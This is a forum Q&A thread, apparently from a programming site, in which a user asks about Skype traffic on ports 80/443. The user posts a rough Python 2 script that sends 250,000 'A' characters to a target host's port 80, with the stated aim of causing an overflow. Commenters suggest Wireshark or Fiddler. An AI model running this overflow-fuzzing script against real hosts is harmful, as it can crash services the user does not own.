# Skype Listening 80/443

Tags: http, https, skype

Anybody have a decrypted session in plain text that you can show an example of a successful TCP handshake for ports 80/443 for Skype? I want to code something in Python that will interact with Skype from a client. Does anybody have any suggestions on what I should do and thanks. You know how an httpd would normally respond to HEAD, GET, POST, PUT, etc? I was just wondering about this information. Great. Thanks.

```
#!/usr/bin/env python2

import socket
import sys

#
# Very Rough Skype Overflow Debugging
# \x41\ # 250 kb
#

x = "\x41"
num = 250000

host  = sys.argv[1]

c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  c.connect((host, 80))
  c.send(' '+x*int(num))
except:
  print("Could not connect to host")
```

Something extremely rough & a skeleton from where I am building from.

Comment: Wireshark, Fiddler might help you. This is also an off topic question, better suited for superuser.com

Comment: I thought it was on topic because I'm trying to see if I can cause an overflow but thanks for the tip.

Comment: A minimal working sample code could help to keep it on topic.

Comment: Added it just now. Thanks.

Comment: Please edit your question and put the code there instead of putting it in a comment!

Comment: Lol yes, I was working on that.